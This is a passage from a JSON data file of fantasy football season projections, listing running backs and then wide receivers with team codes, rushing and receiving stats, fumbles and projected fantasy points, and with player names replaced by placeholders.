"Team": "MIN",
"ATT": 79.3,
"YDS": 307.7,
"TDS": 2.2,
"REC": 15.2,
"YDS_1": 113.6,
"TDS_1": 0.5,
"FL": 0.9,
"FPTS": 71.7
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 68.8,
"YDS": 267.6,
"TDS": 1.7,
"REC": 17,
"YDS_1": 133.8,
"TDS_1": 0.5,
"FL": 0.4,
"FPTS": 69.4
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 61.7,
"YDS": 270.9,
"TDS": 2.2,
"REC": 15.6,
"YDS_1": 111.2,
"TDS_1": 0.4,
"FL": 0.5,
"FPTS": 68.1
},
{
"Player": "<NAME>",
"Team": "BAL",
"ATT": 94.3,
"YDS": 454.5,
"TDS": 2.9,
"REC": 2.6,
"YDS_1": 20,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 66.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 54.5,
"YDS": 252,
"TDS": 1.7,
"REC": 15,
"YDS_1": 130,
"TDS_1": 0.8,
"FL": 1,
"FPTS": 66.1
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 35.7,
"YDS": 160.5,
"TDS": 1.1,
"REC": 23.1,
"YDS_1": 186.1,
"TDS_1": 0.5,
"FL": 1,
"FPTS": 65.7
},
{
"Player": "<NAME>",
"Team": "DEN",
"ATT": 31.5,
"YDS": 136.9,
"TDS": 0.6,
"REC": 26.4,
"YDS_1": 183.9,
"TDS_1": 0.5,
"FL": 0.7,
"FPTS": 63.9
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 51.5,
"YDS": 227.5,
"TDS": 1.2,
"REC": 17.2,
"YDS_1": 159,
"TDS_1": 0.6,
"FL": 1.4,
"FPTS": 63.7
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 52.8,
"YDS": 222.5,
"TDS": 1.5,
"REC": 13.3,
"YDS_1": 103.1,
"TDS_1": 0.2,
"FL": 0.4,
"FPTS": 55.6
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 8,
"YDS": 28.2,
"TDS": 0.4,
"REC": 23.8,
"YDS_1": 219.6,
"TDS_1": 0.9,
"FL": 0.9,
"FPTS": 54.9
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 40.6,
"YDS": 178.6,
"TDS": 1.4,
"REC": 14.6,
"YDS_1": 114.4,
"TDS_1": 0.4,
"FL": 0.3,
"FPTS": 54.4
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 46.8,
"YDS": 157.3,
"TDS": 1,
"REC": 16.7,
"YDS_1": 129.8,
"TDS_1": 0.5,
"FL": 0.3,
"FPTS": 53.5
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 52.4,
"YDS": 201.5,
"TDS": 1.1,
"REC": 14,
"YDS_1": 101.9,
"TDS_1": 0.4,
"FL": 0.3,
"FPTS": 52.4
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 58.2,
"YDS": 216,
"TDS": 1.5,
"REC": 11.2,
"YDS_1": 78.5,
"TDS_1": 0.3,
"FL": 0.2,
"FPTS": 51.1
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 54,
"YDS": 215.2,
"TDS": 1.3,
"REC": 11.7,
"YDS_1": 84.2,
"TDS_1": 0.2,
"FL": 0.8,
"FPTS": 48.9
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 50.1,
"YDS": 197.9,
"TDS": 1.3,
"REC": 10.2,
"YDS_1": 76.9,
"TDS_1": 0.6,
"FL": 0.3,
"FPTS": 48.3
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 36.3,
"YDS": 186.8,
"TDS": 1.2,
"REC": 10.6,
"YDS_1": 88.8,
"TDS_1": 0.4,
"FL": 0.3,
"FPTS": 47.4
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 44.7,
"YDS": 139,
"TDS": 1.4,
"REC": 11.6,
"YDS_1": 99.7,
"TDS_1": 0.6,
"FL": 0.4,
"FPTS": 46.6
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 35.9,
"YDS": 120,
"TDS": 0.6,
"REC": 15.4,
"YDS_1": 123.3,
"TDS_1": 0.6,
"FL": 0.2,
"FPTS": 46.2
},
{
"Player": "<NAME>",
"Team": "LAR",
"ATT": 49.1,
"YDS": 200.6,
"TDS": 1.5,
"REC": 7.5,
"YDS_1": 50.7,
"TDS_1": 0.2,
"FL": 0.3,
"FPTS": 41.7
},
{
"Player": "<NAME>.",
"Team": "PIT",
"ATT": 42,
"YDS": 163.3,
"TDS": 1.3,
"REC": 9.1,
"YDS_1": 78.8,
"TDS_1": 0.4,
"FL": 0.9,
"FPTS": 41.5
},
{
"Player": "<NAME>",
"Team": "PHI",
"ATT": 25.6,
"YDS": 89.1,
"TDS": 0.3,
"REC": 15.6,
"YDS_1": 129.4,
"TDS_1": 0.4,
"FL": 0.1,
"FPTS": 41.4
},
{
"Player": "<NAME>",
"Team": "WAS",
"ATT": 40.4,
"YDS": 168.4,
"TDS": 1.2,
"REC": 8.3,
"YDS_1": 73.9,
"TDS_1": 0.3,
"FL": 0.7,
"FPTS": 40.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 15.7,
"YDS": 69,
"TDS": 0.3,
"REC": 14.4,
"YDS_1": 119.3,
"TDS_1": 0.7,
"FL": 0.1,
"FPTS": 39.2
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 37.6,
"YDS": 187.9,
"TDS": 1.3,
"REC": 7.2,
"YDS_1": 52.5,
"TDS_1": 0.2,
"FL": 0.5,
"FPTS": 39.2
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 42.7,
"YDS": 186,
"TDS": 1.2,
"REC": 7.5,
"YDS_1": 60.9,
"TDS_1": 0.2,
"FL": 1,
"FPTS": 38.7
},
{
"Player": "<NAME>",
"Team": "OAK",
"ATT": 51.9,
"YDS": 180.6,
"TDS": 1.1,
"REC": 7.4,
"YDS_1": 59.7,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 38.5
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 27.6,
"YDS": 169.6,
"TDS": 0.8,
"REC": 8.4,
"YDS_1": 67.2,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 37.5
},
{
"Player": "<NAME>",
"Team": "GB",
"ATT": 32.3,
"YDS": 132.9,
"TDS": 1,
"REC": 8.4,
"YDS_1": 60.5,
"TDS_1": 0.3,
"FL": 0.2,
"FPTS": 34.7
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 14.7,
"YDS": 59,
"TDS": 0.3,
"REC": 12,
"YDS_1": 100.5,
"TDS_1": 0.5,
"FL": 0.1,
"FPTS": 32.3
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 29,
"YDS": 128.2,
"TDS": 0.9,
"REC": 7.6,
"YDS_1": 57.3,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 32
},
{
"Player": "<NAME>",
"Team": "IND",
"ATT": 40,
"YDS": 182.6,
"TDS": 1,
"REC": 4.4,
"YDS_1": 28.8,
"TDS_1": 0.1,
"FL": 1.3,
"FPTS": 29.7
},
{
"Player": "<NAME>",
"Team": "SF",
"ATT": 22.6,
"YDS": 143.6,
"TDS": 0.8,
"REC": 5.2,
"YDS_1": 38.3,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 28
},
{
"Player": "<NAME>",
"Team": "DAL",
"ATT": 31.2,
"YDS": 145,
"TDS": 1,
"REC": 3.6,
"YDS_1": 33.1,
"TDS_1": 0.2,
"FL": 0.4,
"FPTS": 27.9
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 25.6,
"YDS": 88.9,
"TDS": 0.4,
"REC": 8,
"YDS_1": 67.1,
"TDS_1": 0.3,
"FL": 0.1,
"FPTS": 27.5
},
{
"Player": "<NAME>",
"Team": "DET",
"ATT": 21.2,
"YDS": 82.9,
"TDS": 0.4,
"REC": 7.8,
"YDS_1": 56.5,
"TDS_1": 0.6,
"FL": 0.4,
"FPTS": 27.3
},
{
"Player": "<NAME>",
"Team": "ATL",
"ATT": 33,
"YDS": 130.8,
"TDS": 0.9,
"REC": 4.3,
"YDS_1": 34.4,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 27.2
},
{
"Player": "<NAME>",
"Team": "CLE",
"ATT": 0,
"YDS": 89.1,
"TDS": 0.6,
"REC": 6.4,
"YDS_1": 52,
"TDS_1": 0.2,
"FL": 0.1,
"FPTS": 25.1
},
{
"Player": "<NAME>",
"Team": "CAR",
"ATT": 15.8,
"YDS": 83.5,
"TDS": 0.6,
"REC": 6.7,
"YDS_1": 52,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 24.9
},
{
"Player": "<NAME>",
"Team": "NYG",
"ATT": 6.3,
"YDS": 72.1,
"TDS": 0.6,
"REC": 6.9,
"YDS_1": 54.3,
"TDS_1": 0.2,
"FL": 0.1,
"FPTS": 24.1
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 25.2,
"YDS": 107.4,
"TDS": 0.8,
"REC": 3.7,
"YDS_1": 27,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 21.9
},
{
"Player": "<NAME>",
"Team": "MIA",
"ATT": 27.2,
"YDS": 108.3,
"TDS": 0.4,
"REC": 4.3,
"YDS_1": 35.4,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 21.4
},
{
"Player": "<NAME>",
"Team": "HOU",
"ATT": 17.8,
"YDS": 77.4,
"TDS": 0.5,
"REC": 4.2,
"YDS_1": 46.2,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 20.6
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 5.9,
"YDS": 22.2,
"TDS": 0.9,
"REC": 6.9,
"YDS_1": 47.8,
"TDS_1": 0.2,
"FL": 0.1,
"FPTS": 20.5
},
{
"Player": "<NAME>",
"Team": "KC",
"ATT": 7.2,
"YDS": 20.5,
"TDS": 0.2,
"REC": 6.8,
"YDS_1": 67.8,
"TDS_1": 0.6,
"FL": 0.1,
"FPTS": 20.5
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 25.4,
"YDS": 111.9,
"TDS": 0.6,
"REC": 3,
"YDS_1": 20.9,
"TDS_1": 0.1,
"FL": 0,
"FPTS": 20.4
},
{
"Player": "<NAME>",
"Team": "CIN",
"ATT": 15.4,
"YDS": 86.1,
"TDS": 0.4,
"REC": 4.4,
"YDS_1": 33.3,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 19.4
},
{
"Player": "<NAME>",
"Team": "NYJ",
"ATT": 23.4,
"YDS": 85.5,
"TDS": 0.6,
"REC": 3.9,
"YDS_1": 25.5,
"TDS_1": 0.1,
"FL": 0,
"FPTS": 19.4
},
{
"Player": "<NAME>",
"Team": "SEA",
"ATT": 19.8,
"YDS": 90.2,
"TDS": 0.5,
"REC": 3.2,
"YDS_1": 29,
"TDS_1": 0.2,
"FL": 0.2,
"FPTS": 18.9
},
{
"Player": "<NAME>",
"Team": "MIN",
"ATT": 12.8,
"YDS": 41.3,
"TDS": 0.2,
"REC": 6.5,
"YDS_1": 47.7,
"TDS_1": 0.4,
"FL": 0.1,
"FPTS": 18.5
},
{
"Player": "<NAME>",
"Team": "NO",
"ATT": 9.5,
"YDS": 41.4,
"TDS": 0.3,
"REC": 4.9,
"YDS_1": 30.4,
"TDS_1": 0.7,
"FL": 0.1,
"FPTS": 18.2
},
{
"Player": "<NAME>",
"Team": "NE",
"ATT": 11.6,
"YDS": 57.3,
"TDS": 1.4,
"REC": 1.4,
"YDS_1": 12.3,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 16.8
},
{
"Player": "<NAME>",
"Team": "JAC",
"ATT": 9.1,
"YDS": 38.5,
"TDS": 0.3,
"REC": 4.3,
"YDS_1": 33.9,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 13.5
},
{
"Player": "<NAME>",
"Team": "TB",
"ATT": 10,
"YDS": 38.2,
"TDS": 0.3,
"REC": 4.4,
"YDS_1": 30.2,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 13.4
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 17.8,
"YDS": 102.6,
"TDS": 0.5,
"REC": 0.5,
"YDS_1": 4.8,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 13.4
},
{
"Player": "<NAME>",
"Team": "ARI",
"ATT": 14,
"YDS": 69.5,
"TDS": 0.8,
"REC": 0.9,
"YDS_1": 7.7,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 12.9
},
{
"Player": "<NAME>",
"Team": "ATL",
"REC": 105.8,
"YDS": 1525.8,
"TDS": 8.9,
"ATT": 1.5,
"YDS_1": 9.4,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 312
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 102.5,
"YDS": 1438.5,
"TDS": 10.3,
"ATT": 0.2,
"YDS_1": 1.2,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 307.4
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 105.7,
"YDS": 1355.2,
"TDS": 10.4,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 303.6
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 111.7,
"YDS": 1347.9,
"TDS": 8.5,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.4,
"FPTS": 297
},
{
"Player": "<NAME>",
"Team": "PIT",
"REC": 103.8,
"YDS": 1360.9,
"TDS": 8.9,
"ATT": 0.2,
"YDS_1": 1.7,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 293.2
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 81.4,
"YDS": 1274.1,
"TDS": 8.8,
"ATT": 12.6,
"YDS_1": 93,
"TDS_1": 1,
"FL": 0.2,
"FPTS": 276.3
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 84.8,
"YDS": 1366.8,
"TDS": 7.9,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 268
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 97.7,
"YDS": 1254.2,
"TDS": 6.9,
"ATT": 3,
"YDS_1": 20.3,
"TDS_1": 0,
"FL": 0.4,
"FPTS": 265.8
},
{
"Player": "<NAME>.",
"Team": "CLE",
"REC": 87.2,
"YDS": 1208.8,
"TDS": 9,
"ATT": 2.8,
"YDS_1": 11.6,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 263
},
{
"Player": "<NAME>",
"Team": "NE",
"REC": 93.6,
"YDS": 1120.2,
"TDS": 6.3,
"ATT": 7.6,
"YDS_1": 55.9,
"TDS_1": 0.3,
"FL": 0.3,
"FPTS": 249.8
},
{
"Player": "<NAME>",
"Team": "MIN",
"REC": 86.4,
"YDS": 1121.5,
"TDS": 6.6,
"ATT": 3.4,
"YDS_1": 20.5,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 239.8
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 81.8,
"YDS": 1105.5,
"TDS": 7.3,
"ATT": 0.9,
"YDS_1": 5.2,
"TDS_1": 0,
"FL": 0.5,
"FPTS": 235.8
},
{
"Player": "<NAME>",
"Team": "MIN",
"REC": 88.4,
"YDS": 1003.4,
"TDS": 7.3,
"ATT": 6.1,
"YDS_1": 30.9,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 235.5
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 74,
"YDS": 1114.2,
"TDS": 6.3,
"ATT": 6.6,
"YDS_1": 41.8,
"TDS_1": 0.5,
"FL": 0.2,
"FPTS": 230
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 76.4,
"YDS": 1037.8,
"TDS": 5.5,
"ATT": 10.5,
"YDS_1": 73.7,
"TDS_1": 0.7,
"FL": 0.3,
"FPTS": 223.8
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 67,
"YDS": 1067.8,
"TDS": 7.1,
"ATT": 8.4,
"YDS_1": 53.6,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 221.8
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 72.9,
"YDS": 1129.7,
"TDS": 5.8,
"ATT": 0,
"YDS_1": 0.1,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 220.3
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 73.7,
"YDS": 1059.3,
"TDS": 6.2,
"ATT": 0.9,
"YDS_1": 5.4,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 216.7
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 76.6,
"YDS": 999.2,
"TDS": 5.8,
"ATT": 0.7,
"YDS_1": 3.5,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 211.2
},
{
"Player": "<NAME>",
"Team": "TB",
"REC": 71.9,
"YDS": 986.2,
"TDS": 6.3,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 207.8
},
{
"Player": "<NAME>",
"Team": "LAR",
"REC": 69.4,
"YDS": 934.8,
"TDS": 6.7,
"ATT": 3.1,
"YDS_1": 19.2,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 204.7
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 66.5,
"YDS": 906.6,
"TDS": 6.7,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 197.1
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 67,
"YDS": 919.3,
"TDS": 6,
"ATT": 0.4,
"YDS_1": 1.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 195.7
},
{
"Player": "<NAME>",
"Team": "LAC",
"REC": 60.2,
"YDS": 874.6,
"TDS": 7.3,
"ATT": 3.6,
"YDS_1": 19.2,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 193.5
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 66.5,
"YDS": 887.1,
"TDS": 4.5,
"ATT": 13,
"YDS_1": 110.6,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 193.2
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 61.1,
"YDS": 898.2,
"TDS": 6.5,
"ATT": 3.5,
"YDS_1": 16,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 191.2
},
{
"Player": "<NAME>",
"Team": "KC",
"REC": 63.6,
"YDS": 891.8,
"TDS": 6.2,
"ATT": 2.1,
"YDS_1": 14,
"TDS_1": 0.1,
"FL": 0.3,
"FPTS": 190.9
},
{
"Player": "<NAME>",
"Team": "CLE",
"REC": 70.5,
"YDS": 838.8,
"TDS": 5.2,
"ATT": 3.7,
"YDS_1": 25.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 188.6
},
{
"Player": "<NAME>",
"Team": "CIN",
"REC": 61.7,
"YDS": 903.6,
"TDS": 5.9,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 187.2
},
{
"Player": "<NAME>",
"Team": "ATL",
"REC": 63.7,
"YDS": 802.3,
"TDS": 6.5,
"ATT": 5.3,
"YDS_1": 29.6,
"TDS_1": 0.1,
"FL": 0.3,
"FPTS": 185.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 64.9,
"YDS": 852.2,
"TDS": 4.8,
"ATT": 2,
"YDS_1": 11.4,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 179.8
},
{
"Player": "<NAME>",
"Team": "JAC",
"REC": 69.2,
"YDS": 791.5,
"TDS": 4.9,
"ATT": 4.1,
"YDS_1": 25.9,
"TDS_1": 0,
"FL": 0.4,
"FPTS": 179.6
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 63.5,
"YDS": 839.6,
"TDS": 4.9,
"ATT": 2.1,
"YDS_1": 12.5,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 177.7
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 57.2,
"YDS": 845.4,
"TDS": 6,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 177.6
},
{
"Player": "<NAME>",
"Team": "ARI",
"REC": 68.2,
"YDS": 759.3,
"TDS": 5.1,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 174.2
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 58.6,
"YDS": 807.6,
"TDS": 5.7,
"ATT": 0.3,
"YDS_1": 0.9,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 173.2
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 53.7,
"YDS": 861.4,
"TDS": 5.6,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 172.8
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 61.7,
"YDS": 814.3,
"TDS": 4.4,
"ATT": 3.7,
"YDS_1": 23.3,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 171.3
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 64.3,
"YDS": 782.4,
"TDS": 4.3,
"ATT": 2.4,
"YDS_1": 11.1,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 169.4
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 57.2,
"YDS": 716.6,
"TDS": 4.8,
"ATT": 9.6,
"YDS_1": 71.9,
"TDS_1": 0.5,
"FL": 0.2,
"FPTS": 167.7
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 52.4,
"YDS": 762.6,
"TDS": 5.5,
"ATT": 0.2,
"YDS_1": 1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 161.5
},
{
"Player": "<NAME>",
"Team": "NE",
"REC": 59.3,
"YDS": 723.5,
"TDS": 3.7,
"ATT": 3,
"YDS_1": 22.2,
"TDS_1": 0.1,
"FL": 0.3,
"FPTS": 156.1
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 58.6,
"YDS": 689.3,
"TDS": 4,
"ATT": 1.8,
"YDS_1": 10.8,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 152.3
},
{
"Player": "<NAME>",
"Team": "DEN",
"REC": 49.4,
"YDS": 710.2,
"TDS": 4.5,
"ATT": 0.2,
"YDS_1": 1.9,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 147.5
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 53.4,
"YDS": 662.5,
"TDS": 4,
"ATT": 5.4,
"YDS_1": 31.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 147
},
{
"Player": "<NAME>",
"Team": "PHI",
"REC": 44.4,
"YDS": 735,
"TDS": 4.3,
"ATT": 3.5,
"YDS_1": 25,
"TDS_1": 0.1,
"FL": 0.1,
"FPTS": 146.9
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 47.5,
"YDS": 708.4,
"TDS": 4.3,
"ATT": 0,
"YDS_1": 0.2,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 144.1
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 49.1,
"YDS": 677.7,
"TDS": 4.3,
"ATT": 1.8,
"YDS_1": 10.5,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 143.5
},
{
"Player": "<NAME>",
"Team": "CAR",
"REC": 50.6,
"YDS": 654,
"TDS": 4.5,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 142.5
},
{
"Player": "<NAME>",
"Team": "GB",
"REC": 50.7,
"YDS": 671.7,
"TDS": 4.1,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 141.9
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 49.4,
"YDS": 694.1,
"TDS": 3.9,
"ATT": 0.4,
"YDS_1": 1.1,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 141.7
},
{
"Player": "<NAME>",
"Team": "NYG",
"REC": 54.9,
"YDS": 631.8,
"TDS": 3.3,
"ATT": 1.9,
"YDS_1": 14,
"TDS_1": 0.1,
"FL": 0.5,
"FPTS": 138.9
},
{
"Player": "<NAME>",
"Team": "NO",
"REC": 44.2,
"YDS": 644.4,
"TDS": 3.6,
"ATT": 8,
"YDS_1": 54.3,
"TDS_1": 0.3,
"FL": 0.2,
"FPTS": 137.3
},
{
"Player": "<NAME>",
"Team": "SEA",
"REC": 45.7,
"YDS": 652.1,
"TDS": 4.5,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.3,
"FPTS": 137.1
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 47.3,
"YDS": 675.4,
"TDS": 3.4,
"ATT": 1.9,
"YDS_1": 10.7,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 136.5
},
{
"Player": "<NAME>",
"Team": "DEN",
"REC": 54,
"YDS": 601.6,
"TDS": 3.5,
"ATT": 0,
"YDS_1": 0.2,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 134.9
},
{
"Player": "<NAME>",
"Team": "BUF",
"REC": 43.4,
"YDS": 651.8,
"TDS": 4.3,
"ATT": 0.2,
"YDS_1": 0.8,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 134.1
},
{
"Player": "<NAME>",
"Team": "TEN",
"REC": 52.7,
"YDS": 610.6,
"TDS": 3.2,
"ATT": 1.7,
"YDS_1": 9.3,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 134
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 50.1,
"YDS": 634.4,
"TDS": 3.2,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 132.4
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 44.1,
"YDS": 570.2,
"TDS": 3.9,
"ATT": 2.3,
"YDS_1": 11.7,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 125.6
},
{
"Player": "<NAME>",
"Team": "DET",
"REC": 53.3,
"YDS": 538.5,
"TDS": 2.7,
"ATT": 0.9,
"YDS_1": 4.6,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 123.8
},
{
"Player": "<NAME>",
"Team": "HOU",
"REC": 48.8,
"YDS": 540.6,
"TDS": 3.1,
"ATT": 3.7,
"YDS_1": 18.1,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 123.2
},
{
"Player": "<NAME>",
"Team": "PIT",
"REC": 41.7,
"YDS": 591.1,
"TDS": 3.7,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 122.9
},
{
"Player": "<NAME>",
"Team": "BUF",
"REC": 48.8,
"YDS": 564.1,
"TDS": 2.9,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 122.3
},
{
"Player": "<NAME>",
"Team": "CHI",
"REC": 47,
"YDS": 538.2,
"TDS": 2.6,
"ATT": 4.4,
"YDS_1": 27.5,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 119
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 47.4,
"YDS": 540.5,
"TDS": 2.4,
"ATT": 0.5,
"YDS_1": 1.4,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 115.7
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 42.5,
"YDS": 543.3,
"TDS": 3.1,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 114.9
},
{
"Player": "<NAME>",
"Team": "NYJ",
"REC": 43.7,
"YDS": 548.5,
"TDS": 2.7,
"ATT": 0.5,
"YDS_1": 1.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 114.7
},
{
"Player": "<NAME>",
"Team": "SF",
"REC": 35.7,
"YDS": 553.2,
"TDS": 3.5,
"ATT": 2.5,
"YDS_1": 16.1,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 113.6
},
{
"Player": "<NAME>",
"Team": "OAK",
"REC": 39.9,
"YDS": 524.8,
"TDS": 3.5,
"ATT": 0.5,
"YDS_1": 2.9,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 113.4
},
{
"Player": "<NAME>",
"Team": "DAL",
"REC": 45.8,
"YDS": 494.6,
"TDS": 2.6,
"ATT": 2,
"YDS_1": 10.4,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 111.8
},
{
"Player": "<NAME>",
"Team": "BAL",
"REC": 37.6,
"YDS": 527.8,
"TDS": 2.9,
"ATT": 1.8,
"YDS_1": 10.9,
"TDS_1": 0.1,
"FL": 0.2,
"FPTS": 109
},
{
"Player": "<NAME>",
"Team": "IND",
"REC": 38,
"YDS": 487.3,
"TDS": 3.7,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 108.7
},
{
"Player": "<NAME>",
"Team": "WAS",
"REC": 39.9,
"YDS": 462.8,
"TDS": 2.7,
"ATT": 1.4,
"YDS_1": 7.9,
"TDS_1": 0,
"FL": 0.2,
"FPTS": 102.8
},
{
"Player": "<NAME>",
"Team": "BUF",
"REC": 31.1,
"YDS": 503.5,
"TDS": 3.4,
"ATT": 0,
"YDS_1": 0,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 101.6
},
{
"Player": "<NAME>",
"Team": "MIA",
"REC": 37.2,
"YDS": 483.2,
"TDS": 2.6,
"ATT": 0.6,
"YDS_1": 1.2,
"TDS_1": 0,
"FL": 0.1,
"FPTS": 101.2
},
{
"Player": "<NAME>",
"Team": "CLE",
"REC": 35.2,
"YDS": 469.7,
